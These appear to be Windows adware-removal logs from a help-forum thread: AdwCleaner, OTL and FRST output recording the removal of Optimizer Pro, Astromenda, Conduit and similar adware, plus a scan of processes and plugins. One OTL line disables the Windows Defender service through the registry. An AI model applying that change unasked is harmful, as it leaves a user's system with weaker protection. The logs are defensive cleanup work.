File Deleted : C:\Windows\System32\roboot64.exe
File Deleted : C:\Windows\System32\drivers\{55dce8ba-9dec-4013-937e-adbf9317d990}w64.sys
File Deleted : C:\Users\ADMINI~1\AppData\Local\Temp\Uninstall.exe
File Deleted : C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins\safeguard-secure-search.xml
File Deleted : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.azlyrics.com_0.localstorage
File Deleted : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.azlyrics.com_0.localstorage-journal

***** [ Scheduled Tasks ] *****

Task Deleted : Optimizer Pro Schedule

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKCU\Software\MICROSOFT\INTERNET EXPLORER\DOMSTORAGE\superfish.com
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\www.superfish.com
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\updateDealKeeper_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\updateDealKeeper_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\WajamInternetEnhancer_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\WajamInternetEnhancer_RASMANCS
Key Deleted : HKLM\SOFTWARE\Classes\tperrfectcoupon.tperrfectcoupon
Key Deleted : HKLM\SOFTWARE\Classes\tperrfectcoupon.tperrfectcoupon.1.3
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6D4506CE-F855-4657-AA38-DB6B1F733982}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3DC14D9B-955B-8224-6689-C360753795A6}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3408AC0D-510E-4808-8F7B-6B70B1F88534}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{03771AEF-400D-4A13-B712-25878EC4A3F5}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3DC14D9B-955B-8224-6689-C360753795A6}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{95B7759C-8C7F-4BF1-B163-73684A933233}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3DC14D9B-955B-8224-6689-C360753795A6}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{95B7759C-8C7F-4BF1-B163-73684A933233}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{3DC14D9B-955B-8224-6689-C360753795A6}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{3DC14D9B-955B-8224-6689-C360753795A6}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3408AC0D-510E-4808-8F7B-6B70B1F88534}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}
Key Deleted : HKCU\Software\Conduit
Key Deleted : HKCU\Software\InstallCore
Key Deleted : HKCU\Software\Optimizer Pro
Key Deleted : HKCU\Software\systweak
Key Deleted : HKCU\Software\WEDLMNGR
Key Deleted : HKCU\Software\WSE_Astromenda
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\SOFTWARE\Conduit
Key Deleted : HKLM\SOFTWARE\systweak

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17239

Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]

-\\ Mozilla Firefox v31.0 (x86 en-US)

-\\ Google Chrome v36.0.1985.143

[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Deleted [Search Provider] : hxxp://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_coinis_14_49_ff&cd=2XzuyEtN2Y1L1Qzu0B0CyD0F0FyEzyyC0EzzyCyDtByD0D0DtN0D0Tzu0SzyyEzytN1L2XzutBtFtBtCtFtCzztFyEtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2StDyDtDtC0E0DzzyBtGyB0FyB0EtGyByDzz0DtGzytD0E0FtGyDzytBzz0A0CtC0CtDyC0E0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2StByEtAtAzzyD0DtCtGtDtCtC0BtG0CyBtAzztG0DyBzyzytGtCzyyEtAzyzz0CyB0ByC0Azz2Q&cr=828474337&ir=
Deleted [Homepage] : hxxp://astromenda.com/?f=1&a=ast_coinis_14_49_ff&cd=2XzuyEtN2Y1L1Qzu0B0CyD0F0FyEzyyC0EzzyCyDtByD0D0DtN0D0Tzu0SzyyEzytN1L2XzutBtFtBtCtFtCzztFyEtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2StDyDtDtC0E0DzzyBtGyB0FyB0EtGyByDzz0DtGzytD0E0FtGyDzytBzz0A0CtC0CtDyC0E0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2StByEtAtAzzyD0DtCtGtDtCtC0BtG0CyBtAzztG0DyBzyzytGtCzyyEtAzyzz0CyB0ByC0Azz2Q&cr=828474337&ir=
Deleted [Extension] : bopakagnckmlgajfccecajhnimjiiedh

[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\preferences ]


*************************

AdwCleaner[R0].txt - [26248 octets] - [03/09/2014 10:04:31]
AdwCleaner[S0].txt - [8603 octets] - [03/09/2014 10:21:04]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [8663 octets] ##########
 

 

All processes killed
========== COMMANDS ==========
Restore point Set: OTL Restore Point
========== OTL ==========
No active process named OptProReminder.exe was found!
Error: No service named {55dce8ba-9dec-4013-937e-adbf9317d990}w64 was found to stop!
Service\Driver key {55dce8ba-9dec-4013-937e-adbf9317d990}w64 not found.
File C:\Windows\SysNative\drivers\{55dce8ba-9dec-4013-937e-adbf9317d990}w64.sys not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.
HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page| /E : value set successfully!
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.
C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jyilqp0h.default\extensions\[email protected]\content folder moved successfully.
C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jyilqp0h.default\extensions\[email protected] folder moved successfully.
C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jyilqp0h.default\searchplugins\ask-search.xml moved successfully.
C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jyilqp0h.default\searchplugins\Astromenda.xml moved successfully.
Use Chrome's Settings page to change the HomePage.
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3DC14D9B-955B-8224-6689-C360753795A6}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3DC14D9B-955B-8224-6689-C360753795A6}\ not found.
File C:\ProgramData\tPerfeictcoupOOnu\ASr_l6q7G_.dll not found.
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233}\ not found.
Registry value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\Optimizer Pro not found.
File C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe not found.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\gopher|:gopher:// /E : value set successfully!
Folder C:\ProgramData\tPerfeictcoupOOnu\ not found.
C:\ProgramData\Avg_Update_0814tb folder moved successfully.
C:\Users\administrator\Documents\Optimizer Pro folder moved successfully.
Folder C:\Users\administrator\AppData\Roaming\Optimizer Pro\ not found.
C:\Users\administrator\AppData\Roaming\WSE_Astromenda\UpdateProc folder moved successfully.
C:\Users\administrator\AppData\Roaming\WSE_Astromenda folder moved successfully.
C:\Program Files (x86)\Deal Keeper folder moved successfully.
C:\Users\administrator\AppData\Roaming\Astromenda\icons_2.21.18.4 folder moved successfully.
C:\Users\administrator\AppData\Roaming\Astromenda folder moved successfully.
Folder C:\ProgramData\~0\ not found.
Folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Optimizer Pro v3.2\ not found.
Folder C:\Program Files (x86)\Optimizer Pro\ not found.
C:\Windows\Tasks\0814tbUpdateInfo.job moved successfully.
File C:\Users\administrator\Desktop\Optimizer Pro.lnk not found.
File C:\Windows\SysNative\roboot64.exe not found.
C:\Users\administrator\AppData\Roaming\Systweak\Systweak Support Dock folder moved successfully.
C:\Users\administrator\AppData\Roaming\Systweak folder moved successfully.
========== REGISTRY ==========
Registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\70e6ca8c\ not found.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend\\"Start" | DWORD:4 /E : value set successfully!
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: administrator
->Temp folder emptied: 1638257254 bytes
->Temporary Internet Files folder emptied: 54085889 bytes
->Java cache emptied: 1367900 bytes
->FireFox cache emptied: 18495682 bytes
->Google Chrome cache emptied: 191864082 bytes
->Apple Safari cache emptied: 1679360 bytes
->Flash cache emptied: 1349 bytes
 
User: All Users
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Public
 
User: user
->Temp folder emptied: 2246609 bytes
->Temporary Internet Files folder emptied: 11861425 bytes
->Flash cache emptied: 321 bytes
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 94656 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 678922128 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 79334835 bytes
RecycleBin emptied: 168983847 bytes
 
Total Files Cleaned = 2,715.00 mb
 
 
OTL by OldTimer - Version 3.2.69.0 log created on 09032014_115522

Files\Folders moved on Reboot...
C:\Users\administrator\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.
C:\Users\administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat moved successfully.
C:\Windows\SysNative\WPRO_41_2001woem.tmp moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
 

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 03-09-2014 02
Ran by Administrator (administrator) on OFFICE2 on 03-09-2014 12:11:33
Running from C:\Users\administrator\Desktop
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingc...can-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingc...can-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(ArcSoft, Inc.) C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(PFU LIMITED) C:\Windows\twain_32\Fjscan32\FJTWMKSV.exe
(Prosoftnet) C:\Program Files (x86)\IDriveWindows\id_service.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
() C:\Program Files\Intel\Intel® Smart Connect Technology Agent\iSCTAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Protexis Inc.) C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
() C:\Program Files (x86)\High Meadow Business Solutions\RetailEdge 8.2\Server\RetailEdge_Server_8_0.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\ismagent.exe
() C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\updateui.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(PFU LIMITED) C:\Windows\twain_32\Fjscan32\ERG\FTErGuid.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(PFU LIMITED) C:\Windows\twain_32\Fjscan32\SOP\FtLnSOP.exe
(FUJITSU LIMITED) C:\Windows\twain_32\Fjscan32\FjtwMkup.exe
(PFU LIMITED) C:\Windows\twain_32\Fjscan32\FTPWREVT\FTPWREVT.exe
(SAMSUNG Electornics Co., Ltd.) C:\Users\administrator\AppData\Roaming\VERIZON\UA_ar\UA.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\APSDaemon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_145.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_145.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe
(Microsoft Corporation) C:\Windows\System32\PrintIsolationHost.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13219984 2012-11-06] (Realtek Semiconductor)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [285240 2012-09-01] (Intel Corporation)
HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe [133408 2012-09-11] (Intel Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291648 2012-05-20] (Intel Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [avast] => C:\Program Files\AVAST Software\Avast\avastUI.exe [4858968 2013-08-30] (AVAST Software)
HKLM-x32\...\Run: [FtLnSOP_setup] => C:\Windows\Twain_32\Fjscan32\SOP\FtLnSOP.exe [143360 2008-12-09] (PFU LIMITED)
HKLM-x32\...\Run: [FJTWAIN Setup] => C:\Windows\Twain_32\fjscan32\FjtwMkup.exe [131072 2009-07-08] (FUJITSU LIMITED)
HKLM-x32\...\Run: [FTPWRENV] => C:\Windows\Twain_32\Fjscan32\FTPWREVT\FTPWREVT.exe [45056 2007-10-16] (PFU LIMITED)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [QuickFinder Scheduler] => c:\Program Files (x86)\Corel\WordPerfect Office X4\Programs\QFSCHD140.EXE [83232 2008-03-21] (Corel Corporation)
HKLM-x32\...\Run: [IDrive Background process] => "C:\Program Files (x86)\IDriveWindows\idwbg_600.exe"
HKLM-x32\...\Run: [IDrive Tray] => "C:\Program Files (x86)\IDriveWindows\idrivetray.exe" min
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3699689465-499021782-3584132684-500\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-11-20] (Apple Inc.)
HKU\S-1-5-21-3699689465-499021782-3584132684-500\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-11-20] (Apple Inc.)
HKU\S-1-5-21-3699689465-499021782-3584132684-500\...\Run: [IDrive Background process] => "C:\Program Files (x86)\IDriveWindows\idwbg_600.exe"
HKU\S-1-5-21-3699689465-499021782-3584132684-500\...\Run: [IDrive Tray] => "C:\Program Files (x86)\IDriveWindows\idrivetray.exe" min
HKU\S-1-5-21-3699689465-499021782-3584132684-500\...\MountPoints2: {34ea4348-338b-11e4-93eb-bc5ff496e865} - E:\LaunchU3.exe -a
HKU\S-1-5-21-3699689465-499021782-3584132684-500\...\MountPoints2: {b0576574-9432-11e3-8cb8-bc5ff496e865} - E:\VZW_Software_upgrade_assistant.exe
Startup: C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Verizon Wireless Software Utility Application for Android – Samsung.lnk
ShortcutTarget: Verizon Wireless Software Utility Application for Android – Samsung.lnk -> C:\Users\administrator\AppData\Roaming\VERIZON\UA_ar\UA.exe (SAMSUNG Electornics Co., Ltd.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Error Recovery Guide.lnk
ShortcutTarget: Error Recovery Guide.lnk -> C:\Windows\twain_32\Fjscan32\ERG\FTErGuid.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TSPrintUser.lnk
ShortcutTarget: TSPrintUser.lnk -> C:\Program Files (x86)\TerminalWorks\TSPrint\TSPrintUser.exe (TerminalWorks Ltd.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TSScanUser.lnk
ShortcutTarget: TSScanUser.lnk -> C:\Program Files (x86)\TerminalWorks\TSScan\TSScanUser.exe (TerminalWorks Ltd.)
ShellIconOverlayIdentifiers: 00avast -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll (AVAST Software)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xAFCE88A4171ACF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
SearchScopes: HKLM - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: avast! Online Security -> {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
Toolbar: HKLM-x32 - avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
DPF: HKLM-x32 {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} https://secure.logme...rl.cab?lmi=1007
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{09416B0F-7D33-4571-9927-E3FB86D5F686}: [NameServer] 192.168.1.2,208.67.220.220

FireFox:
========
FF ProfilePath: C:\Users\administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jyilqp0h.default
FF Homepage: https://webmail.eart...p&x=-1703872102
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll ()
FF Plugin: @java.com/DTPlugin,version=10.40.2 -> C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.40.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
